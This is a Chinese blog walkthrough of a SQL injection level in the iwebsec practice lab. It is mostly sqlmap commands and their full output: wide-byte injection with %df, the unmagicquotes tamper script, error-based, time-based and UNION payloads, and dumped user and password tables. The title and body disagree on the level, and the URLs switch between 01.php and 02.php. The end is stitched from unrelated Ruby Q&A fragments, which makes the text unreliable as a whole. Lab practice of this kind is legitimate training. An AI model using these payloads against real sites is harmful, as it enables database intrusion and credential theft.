iwebsec靶场 SQL注入漏洞通关笔记1- 数字型注入_mooyuan的博客-CSDN博客
目录
目录
打开靶场,url为 http://192.168.71.151/sqli/02.php?id=1 如下所示
如下所示,存在宽字节注入漏洞且闭合符号为单引号
首先构造sqlmap语句,url地址为 http://192.168.71.151/sqli/02.php?id=1
很明显直接使用如下语句是不会成功的
sqlmap -u http://192.168.71.151/sqli/02.php?id=1 --current-db --dump --batch因为这是宽字节注入漏洞,使用默认方法不会渗透成功
将url中的id=1便问id=1%df* ,即将宽字符特征%df加入到参数1后,同时在后面加上*
sqlmap -u http://192.168.71.151/sqli/01.php?id=1%df* --current-db --dump --batch完整交互过程如下所示
[21:46:26] [INFO] URI parameter '#1*' is 'MySQL UNION query (random number) - 1 to 20 columns' injectable
URI parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 1260 HTTP(s) requests:
---
Parameter: #1* (URI)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: http://192.168.71.151:80/sqli/01.php?id=1%df AND (SELECT 5388 FROM(SELECT COUNT(*),CONCAT(0x7178707a71,(SELECT (ELT(5388=5388,1))),0x7171767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: http://192.168.71.151:80/sqli/01.php?id=1%df AND (SELECT 2061 FROM (SELECT(SLEEP(5)))lOnr)
Type: UNION query
Title: MySQL UNION query (random number) - 3 columns
Payload: http://192.168.71.151:80/sqli/01.php?id=-7105 UNION ALL SELECT CONCAT(0x7178707a71,0x706b715151526771476f687a6e4c71617a504e4e5a644541656d6b4f45757642636c43795276784f,0x7171767a71),9687,9687#
---
[21:46:26] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: Apache 2.2.15, PHP 5.2.17
back-end DBMS: MySQL >= 5.0
[21:46:26] [INFO] fetching current database
current database: 'iwebsec'
[21:46:26] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:46:26] [INFO] fetching current database
[21:46:26] [INFO] fetching tables for database: 'iwebsec'
[21:46:26] [INFO] retrieved: 'sqli'
[21:46:26] [INFO] retrieved: 'user'
[21:46:27] [INFO] retrieved: 'users'
[21:46:27] [INFO] retrieved: 'xss'
[21:46:27] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'name','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'xss' in database 'iwebsec'
[21:46:27] [INFO] retrieved: '7','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '6','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '5','<img src=1 onerror=alert(/ctfs/)/>'
[21:46:27] [INFO] retrieved: '1','iwebsec'
[21:46:27] [INFO] retrieved: '8','<?php phpinfo();?>'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 1 | iwebsec |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+
[21:46:27] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[21:46:27] [INFO] fetching columns for table 'user' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'user' in database 'iwebsec'
[21:46:27] [INFO] retrieved: '1','pass1','user1'
[21:46:27] [INFO] retrieved: '2','pass2','user2'
[21:46:27] [INFO] retrieved: '3','pass3','user3'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+
[21:46:27] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[21:46:27] [INFO] fetching columns for table 'users' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] retrieved: 'role','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+
[21:46:27] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[21:46:27] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'id','int(11)'
[21:46:27] [INFO] retrieved: 'username','varchar(255)'
[21:46:27] [INFO] retrieved: 'password','varchar(255)'
[21:46:27] [INFO] retrieved: 'email','varchar(255)'
[21:46:27] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
[21:46:27] [INFO] retrieved: 'user1@iwebsec.com','1','pass1','user1'
[21:46:27] [INFO] retrieved: 'user2@iwebsec.com','2','pass2','user2'
[21:46:27] [INFO] retrieved: 'user3@iwebsec.com','3','pass3','user3'
[21:46:27] [INFO] retrieved: 'user4@iwebsec.com','4','admin','admin'
[21:46:27] [INFO] retrieved: '123@123.com','5','123','123'
[21:46:27] [INFO] retrieved: '1234@123.com','6','123','ctfs' or updatexml(1,concat(0x7e,(version())),0)#'
[21:46:27] [INFO] retrieved: 'iwebsec02@iwebsec.com','7','123456','iwebsec' or updatexml(1,concat(0x7e,(version())),0)#'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | user1@iwebsec.com | pass1 | user1 |
| 2 | user2@iwebsec.com | pass2 | user2 |
| 3 | user3@iwebsec.com | pass3 | user3 |
| 4 | user4@iwebsec.com | admin | admin |
| 5 | 123@123.com | 123 | 123 |
| 6 | 1234@123.com | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | iwebsec02@iwebsec.com | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+
[21:46:27] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[21:46:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[21:46:27] [WARNING] your sqlmap version is outdated
[*] ending @ 21:46:27 /2022-11-24/
增加宽字符脚本 --tamper unmagicquotes
sqlmap -u http://192.168.71.151/sqli/01.php?id=1 --current-db --dump --batch --tamper unmagicquotes完整交互如下所示
kali@kali:~$ sqlmap -u http://192.168.71.151/sqli/01.php?id=1 --current-db --dump --batch --tamper unmagicquotes
___
__H__
___ ___[)]_____ ___ ___ {1.5.11#stable}
|_ -| . ['] | .'| . |
|___|_ [.]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 21:53:15 /2022-11-24/
[21:53:15] [INFO] loading tamper module 'unmagicquotes'
[21:53:15] [INFO] resuming back-end DBMS 'mysql'
[21:53:15] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: Boolean-based blind - Parameter replace (original value)
Payload: id=(SELECT (CASE WHEN (2397=2397) THEN 1 ELSE (SELECT 9949 UNION SELECT 5355) END))
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1 AND (SELECT 2678 FROM(SELECT COUNT(*),CONCAT(0x71786a6b71,(SELECT (ELT(2678=2678,1))),0x716b7a6271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: id=1 AND (SELECT 3668 FROM (SELECT(SLEEP(5)))vjAy)
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=1 UNION ALL SELECT CONCAT(0x71786a6b71,0x456c514d62616f4b7a7651664c6f6b4e72567142766663796152416b674642714e7350626d456542,0x716b7a6271),NULL,NULL-- -
---
[21:53:15] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[21:53:15] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS 6
web application technology: PHP 5.2.17, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[21:53:15] [INFO] fetching current database
current database: 'iwebsec'
[21:53:15] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) entries
[21:53:15] [INFO] fetching current database
[21:53:15] [INFO] fetching tables for database: 'iwebsec'
[21:53:15] [INFO] fetching columns for table 'user' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'user' in database 'iwebsec'
Database: iwebsec
Table: user
[3 entries]
+----+----------+----------+
| id | password | username |
+----+----------+----------+
| 1 | pass1 | user1 |
| 2 | pass2 | user2 |
| 3 | pass3 | user3 |
+----+----------+----------+
[21:53:15] [INFO] table 'iwebsec.`user`' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/user.csv'
[21:53:15] [INFO] fetching columns for table 'sqli' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'sqli' in database 'iwebsec'
Database: iwebsec
Table: sqli
[7 entries]
+----+-----------------------+----------+------------------------------------------------------+
| id | email | password | username |
+----+-----------------------+----------+------------------------------------------------------+
| 1 | user1@iwebsec.com | pass1 | user1 |
| 2 | user2@iwebsec.com | pass2 | user2 |
| 3 | user3@iwebsec.com | pass3 | user3 |
| 4 | user4@iwebsec.com | admin | admin |
| 5 | 123@123.com | 123 | 123 |
| 6 | 1234@123.com | 123 | ctfs' or updatexml(1,concat(0x7e,(version())),0)# |
| 7 | iwebsec02@iwebsec.com | 123456 | iwebsec' or updatexml(1,concat(0x7e,(version())),0)# |
+----+-----------------------+----------+------------------------------------------------------+
[21:53:15] [INFO] table 'iwebsec.sqli' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/sqli.csv'
[21:53:15] [INFO] fetching columns for table 'xss' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'xss' in database 'iwebsec'
Database: iwebsec
Table: xss
[5 entries]
+----+------------------------------------+
| id | name |
+----+------------------------------------+
| 7 | <img src=1 onerror=alert(/ctfs/)/> |
| 6 | <img src=1 onerror=alert(/ctfs/)/> |
| 5 | <img src=1 onerror=alert(/ctfs/)/> |
| 1 | iwebsec |
| 8 | <?php phpinfo();?> |
+----+------------------------------------+
[21:53:15] [INFO] table 'iwebsec.xss' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/xss.csv'
[21:53:15] [INFO] fetching columns for table 'users' in database 'iwebsec'
[21:53:15] [INFO] fetching entries for table 'users' in database 'iwebsec'
Database: iwebsec
Table: users
[1 entry]
+-------+-------------+----------+
| role | password | username |
+-------+-------------+----------+
| admin | mall123mall | orange |
+-------+-------------+----------+
[21:53:15] [INFO] table 'iwebsec.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/192.168.71.151/dump/iwebsec/users.csv'
[21:53:15] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.71.151'
[21:53:15] [WARNING] your sqlmap version is outdated
[*] ending @ 21:53:15 /2022-11-24/
bp抓包,将报文保存为iwebsec02.txt
修改iwebsec02.txt,将id=1修改为id=1%df'* 如下图所示
注意:根据源码分析这里面的%df是宽字节,'是单引号闭合,*则加在闭合的'后面,告知sqlmap这里为注入点,于是注入语句为
sqlmap -r iwebsec02.txt --current-db --dump --batch 如下所示,注入成功
由于sqlmap的完整交互过程前面已有,故而这里并不将完整过程再次列出。
本次渗透的关卡为字符型注入,其实总结来讲本关卡的难度相对而言作为第二关有些难度。
通过源码再来分析下SQL注入重点内容:
(1)闭合方式是什么?iwebsec的第02关关卡为字符型,闭合方式为单引号
(2)注入类别是什么?这部分是宽字节型注入,需要使用%df
(3)是否过滤了关键字?很明显通过源码,iwebsec的字符型关卡无过滤任何信息
了解了如上信息就可以针对性进行SQL渗透,使用sqlmap工具渗透更是事半功倍,以上就是今天要讲的第2关注入内容,初学者建议按部就班先使用手动注入练习,再进行sqlmap渗透。
总的来说,我对ruby还比较陌生,我正在为我正在创建的对象编写一些rspec测试用例。许多测试用例都非常基础,我只是想确保正确填充和返回值。我想知道是否有办法使用循环结构来执行此操作。不必为我要测试的每个方法都设置一个assertEquals。例如:describeitem,"TestingtheItem"doit"willhaveanullvaluetostart"doitem=Item.new#HereIcoulddotheitem.name.shouldbe_nil#thenIcoulddoitem.category.shouldbe_nilendend但我想要一些方法来使用
我有一个字符串input="maybe(thisis|thatwas)some((nice|ugly)(day|night)|(strange(weather|time)))"Ruby中解析该字符串的最佳方法是什么?我的意思是脚本应该能够像这样构建句子:maybethisissomeuglynightmaybethatwassomenicenightmaybethiswassomestrangetime等等,你明白了......我应该一个字符一个字符地读取字符串并构建一个带有堆栈的状态机来存储括号值以供以后计算,还是有更好的方法?也许为此目的准备了一个开箱即用的库?
我的目标是转换表单输入,例如“100兆字节”或“1GB”,并将其转换为我可以存储在数据库中的文件大小(以千字节为单位)。目前,我有这个:defquota_convert@regex=/([0-9]+)(.*)s/@sizes=%w{kilobytemegabytegigabyte}m=self.quota.match(@regex)if@sizes.include?m[2]eval("self.quota=#{m[1]}.#{m[2]}")endend这有效,但前提是输入是倍数(“gigabytes”,而不是“gigabyte”)并且由于使用了eval看起来疯狂不安全。所以,功能正常,
在我的Rails(2.3,Ruby1.8.7)应用程序中,我需要将字符串截断到一定长度。该字符串是unicode,在控制台中运行测试时,例如'א'.length,我意识到返回了双倍长度。我想要一个与编码无关的长度,以便对unicode字符串或latin1编码字符串进行相同的截断。我已经了解了Ruby的大部分unicode资料,但仍然有些一头雾水。应该如何解决这个问题? 最佳答案 Rails有一个返回多字节字符的mb_chars方法。试试unicode_string.mb_chars.slice(0,50)
对于具有离线功能的智能手机应用程序,我正在为Xml文件创建单向文本同步。我希望我的服务器将增量/差异(例如GNU差异补丁)发送到目标设备。这是计划:Time=0Server:hasversion_1ofXmlfile(~800kiB)Client:hasversion_1ofXmlfile(~800kiB)Time=1Server:hasversion_1andversion_2ofXmlfile(each~800kiB)computesdeltaoftheseversions(=patch)(~10kiB)sendspatchtoClient(~10kiBtransferred)Cl
大约一年前,我决定确保每个包含非唯一文本的Flash通知都将从模块中的方法中获取文本。我这样做的最初原因是为了避免一遍又一遍地输入相同的字符串。如果我想更改措辞,我可以在一个地方轻松完成,而且一遍又一遍地重复同一件事而出现拼写错误的可能性也会降低。我最终得到的是这样的:moduleMessagesdefformat_error_messages(errors)errors.map{|attribute,message|"Error:#{attribute.to_s.titleize}#{message}."}enddeferror_message_could_not_find(obje
我试图获取一个长度在1到10之间的字符串,并输出将字符串分解为大小为1、2或3的连续子字符串的所有可能方式。例如:输入:123456将整数分割成单个字符,然后继续查找组合。该代码将返回以下所有数组。[1,2,3,4,5,6][12,3,4,5,6][1,23,4,5,6][1,2,34,5,6][1,2,3,45,6][1,2,3,4,56][12,34,5,6][12,3,45,6][12,3,4,56][1,23,45,6][1,2,34,56][1,23,4,56][12,34,56][123,4,5,6][1,234,5,6][1,2,345,6][1,2,3,456][123
我正在使用的第三方API的文档状态:"[O]urAPIonlyacceptspaddedBase64encodedstrings."什么是“填充的Base64编码字符串”以及如何在Ruby中生成它们。下面的代码是我第一次尝试创建转换为Base64的JSON格式数据。xa=Base64.encode64(a.to_json) 最佳答案 他们说的padding其实就是Base64本身的一部分。它是末尾的“=”和“==”。Base64将3个字节的数据包编码为4个编码字符。所以如果你的输入数据有长度n和n%3=1=>"=="末尾用于填充n%
我有一大串格式化数据(例如JSON),我想使用Psychinruby同时保留格式转储到YAML。基本上,我希望JSON使用literalstyle出现在YAML中:---json:|{"page":1,"results":["item","another"],"total_pages":0}但是,当我使用YAML.dump时,它不使用文字样式。我得到这样的东西:---json:!"{\n\"page\":1,\n\"results\":[\n\"item\",\"another\"\n],\n\"total_pages\":0\n}\n"我如何告诉Psych以想要的样式转储标量?解
在我的应用程序中,我需要能够找到所有数字子字符串,然后扫描每个子字符串,找到第一个匹配范围(例如5到15之间)的子字符串,并将该实例替换为另一个字符串“X”。我的测试字符串s="1foo100bar10gee1"我的初始模式是1个或多个数字的任何字符串,例如,re=Regexp.new(/\d+/)matches=s.scan(re)给出["1","100","10","1"]如果我想用“X”替换第N个匹配项,并且只替换第N个匹配项,我该怎么做?例如,如果我想替换第三个匹配项“10”(匹配项[2]),我不能只说s[matches[2]]="X"因为它做了两次替换“1fooX0barXg